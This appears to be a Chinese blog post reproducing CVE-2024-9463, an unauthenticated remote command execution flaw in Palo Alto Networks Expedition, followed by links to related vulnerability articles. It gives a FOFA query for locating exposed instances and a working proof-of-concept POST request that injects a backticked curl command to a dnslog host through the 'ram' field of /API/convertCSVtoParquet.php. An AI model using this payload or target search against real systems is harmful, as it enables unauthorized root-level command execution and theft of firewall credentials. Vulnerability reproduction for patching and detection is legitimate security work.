Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

已于 2024-10-14 11:45:18 修改
阅读量928 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-10-14 10:49:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41904294/article/details/142912279

0x01 产品简介

Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞概述

Palo Alto Networks Expedition 1.2.92 以下版本 convertCSVtoParquet 接口存在远程命令执行漏洞。恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。

0x03 复现环境

FOFA:title="Expedition Project"

0x04 漏洞复现

PoC

POST /API/convertCSVtoParquet.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

ram=watchTowr`curl+http://odtcqx.dnslog.cn`

 

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Palo Alto Networks Expedition 未授权SQL注入漏洞复现(CVE-2024-9465)
0xSec
10-12 702
Palo Alto Networks Expedition中存在的一个SQL注入漏洞POC及漏洞细节已经公开,该漏洞允许未经验证的攻击者获取Expedition数据库内容,例如密码哈希、用户名、设备配置和设备API密钥,利用这一点,攻击者还可以在Expedition 系统上创建和读取任意文件。
Palo Alto Networks Expedition 远程命令执行漏洞复现(CVE-2024-9463)
iSee857的博客
10-18 866
攻击者可通过简单的漏洞利用读取数据库内容和任意文件,甚至执行系统命令。该漏洞允许未经身份验证的攻击者以root身份执行命令,暴露PAN-OS防火墙的用户名、密码等敏感信息。Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化。策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。厂商已发布补丁 请即时升级。
PaloAlto-Expedition OS命令注入漏洞复现(CVE-2025-0107)
iSee857的博客
06-04 427
Palo Alto Networks Expedition 中存在一个作系统命令注入漏洞,未经身份验证的攻击者可利用该漏洞,以 Expedition 中的 www-data 用户身份运行任意作系统命令,从而导致运行 PAN-OS 软件的防火墙的用户名、明文密码、设备配置和设备 API 密钥泄露(CVE-2025-0107)
Palo Alto Networks Expedition 经过身份验证的命令注入(CVE-2024-9464)
iSee857的博客
10-16 796
Palo Alto Networks Expedition 中的操作系统命令注入漏洞允许经过身份验证的攻击者以 Expedition 中的 root 身份运行任意操作系统命令,从而导致用户名、明文密码、设备配置和 PAN-OS 防火墙的设备 API 密钥泄露。Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。厂商已发布补丁 请即时升级。
漏洞复现】Palo Alto Networks Expedition 远程命令执行漏洞CVE-2024-9463
m0_71944965的博客
12-11 292
Palo Alto Networks Expedition存在安全漏洞。攻击者可通过简单的漏洞利用读取数据库内容和任意文件,甚至执行系统命令。该漏洞允许未经身份验证的攻击者以root身份执行命令暴露PAN-OS防火墙的用户名、密码等敏感信息。
Palo Alto 修复多个严重的防火墙漏洞
smellycat000的专栏
10-14 697
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周三,Palo Alto Networks 公司修复了位于 Expedition 客户迁移工具中的多个严重漏洞,并提醒称攻击者可借此接管防火墙管理员账户。这些漏洞由 Horizon3.ai 发现并记录,可导致攻击者读取 Expedition 数据库内容和任意文件,以及将任意文件写入位于 Expedition 系统中的临时存储位置。从该公司发布的...
漏洞复现】Palo Alto PAN-OS身份认证绕过CVE-2024-0012及命令执行漏洞CVE-2024-9474
m0_46381222的博客
12-09 1943
漏洞复现】Palo Alto PAN-OS身份认证绕过CVE-2024-0012及命令执行漏洞CVE-2024-9474
Palo Alto:注意!PAN-OS 防火墙 0day 漏洞已遭利用
smellycat000的专栏
04-15 572
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Palo Alto Networks 公司提醒称,PAN-OS 防火墙中存在一个严重的命令注入0day漏洞,且该漏洞已遭在野利用。Palo Alto Networks 公司发布安全公告称,“Palo Alto Networks 注意到数量有限的攻击正在利用该漏洞。”该漏洞由 Volexity 公司发现,编号为CVE-2024-3400,是一个命令...
Palo Alto Networks 修复多个提权漏洞
最新发布
smellycat000的专栏
06-13 88
Palo Alto Networks 公司还修复了位于 PAN-OS 中的一个中危命令注入漏洞CVE-2025-4231,可导致攻击者认证为管理员,以root 权限执行操作。此外,该公司还修复了位于 GlobalProtect(Windows 和 macOS)“端点流量策略增强 (Endpoint Traffic Policy Enforcement)”特性中的一个访问控制不当漏洞,它可导致数据包处于未加密状态,并导致对网络具有物理访问权限的攻击者注入一个恶意设备并拦截这些数据包。觉得不错,就点个 “
Palo Alto 修复已遭利用的严重PAN-OS DoS 漏洞
smellycat000的专栏
12-30 595
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Palo Alto Networks 披露了一个影响 PAN-OS 软件的高危漏洞CVE-2024-3393,CVSS 8.7),它可在易受攻击设备上引发拒绝服务 (DoS) 条件。该漏洞影响 PAN-OS 10.X 和11.X 版本以及运行PAN-OS 10.2.8及后续或11.2.3之前版本的 Prisma Access。该漏洞已在 PAN...
Palo Alto防火墙远程代码执行漏洞复现
Just Do It
12-26 4132
最近,花了点时间复现了一下这个漏洞,踩过一些坑,在这里记录一下。关于这个漏洞的情况,可以看这里。       文章介绍说,三个漏洞组合完成代码执行的过程。作者其实写的蛮清楚的,但是在第三步是有一些坑要踩的。       首先,来复现部分权限绕过,先访问/php/utils/debug.php。会直接跳转到登录页面,如下图所示:       接着按照作者指导的方式,访问/esp/cms_c
Palo Alto 再次修复一个严重的 PAN-OS 漏洞
smellycat000的专栏
07-09 1436
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今日,Palo Alto Networks (PAN)公司修复了PAN-OS GlobalProtect门户网站中的又...
PaloAlto DNS代理漏洞CVE-2017-8390)分析
ask every day
04-29 1229
1漏洞定位1.1漏洞基本情况该漏洞为公开漏洞,其CVE编号为:CVE-2017-8390,属于RCE漏洞,尚无POC公开,对应的服务为DNS代理服务,对应模块为dnsproxyd,以root权限运行。适用范围:PAN-OS before 6.1.18PAN-OS 7.x before 7.0.16PAN-OS 7.1.x before 7.1.11PAN-OS 8.x before 8.0.31....
Palo Alto Networks 支持仪表盘漏洞泄露数千份客户支持工单
smellycat000的专栏
04-01 313
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士领先的网络安全和网络产品和防火墙提供商Palo Alto Networks (PAN) 公司的支持仪表盘中存在一个bug,导致数千份客户支持工单被暴露给越权个体。被暴露的信息包括创建支持工单的人员姓名和商务联系信息、PAN 公司员工和客户之间的会话。从媒体 BleepingComputer 得到的证据来看,某些支持工单中...
格式化字符串漏洞_Palo Alto Global Protect 网关设备格式化字符串漏洞分析(CVE20191579)...
weixin_39902545的博客
11-27 829
0x00 分析背景最近分析了几个存在漏洞Palo Alto防火墙设备,这些特定设备面向公网并配置为了Global Protect网关。作为一个bug bounty新手,我经常被客户要求要证明我报告中漏洞的可利用性。之前DEVCORE团队成员Orange Tsai和Meh Chang最近发布了博客文章。他们发现了一个预认证格式化字符串漏洞(CVE-2019-1579),该漏洞在一年多前(...
Palo Alto Networks漏洞防护扩展至云端
weixin_34379433的博客
07-03 236
中国北京,2016年4月12日 –下一代安全企业Palo Alto Networks?(纽交所代码:PANW)近日宣布进一步增强其下一代安全平台,扩展漏洞防护能力,以满足那些依赖云环境和SaaS应用的业务对安全的需求。 企业机构需要变得更加灵活和有竞争力,这促使商业应用的开发、部署做出改变。工作负载和数据日益分散于物理和云计算环境中。传统安全产品并不是为...
美网络司令部:马上修复严重的 PAN-OS 漏洞,免遭国家黑客攻击
smellycat000的专栏
06-30 818
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今天,美国网络司令部表示,外国国家黑客组织很可能将利用PAN-OS中的一个重大安全漏洞。PAN-OS是Palo Al...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值